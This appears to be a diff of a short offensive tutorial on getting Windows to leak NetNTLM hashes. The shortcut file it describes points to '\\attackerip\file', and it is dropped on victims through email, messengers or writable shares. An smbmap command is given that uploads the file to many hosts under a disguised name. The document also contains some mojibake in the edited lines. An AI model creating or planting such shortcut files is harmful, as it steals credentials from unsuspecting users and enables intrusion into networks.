Back and forth with .lnk and NetNTLM hash sent by Windows OS

 Abusing the feature

 How to generate the file?
 The .lnk format can be a bit burdensome to create on Windows as the OS is verifying existence of the target.
 Instead we will use the .url file format, which behave similarly.
 Right click and New > Shortcut, then specify whatever http:// URL and create the file.
 Then Right click again and edit it and now type as Target \\attackerip\file or file://attackerip/file.
-Finally you can copy it or send it.
+Finally you can copy it or send it.For other OS, someone recently created a python script to create .lnk(s) for this purpose.
+Please note that you don't need a specific payload or exploit, this is standard shortcut.

-Now how can we drop the file to the disk? πŸ™ There are multiple ways.
+Now how can we drop the file to the disk? π There are multiple ways.
 You could send it using emails inside a .zip or using messengers file transfers.
 You can also drop it on a share folder if you have write access onto it.
 Any upload possibility to Windows OS will work.
 For instance using smbmap on multiple targets:

 smbmap --host-file writablehosts.txt --upload 'leakhash.lnk C$\temp\trustmeimadolphin.lnk'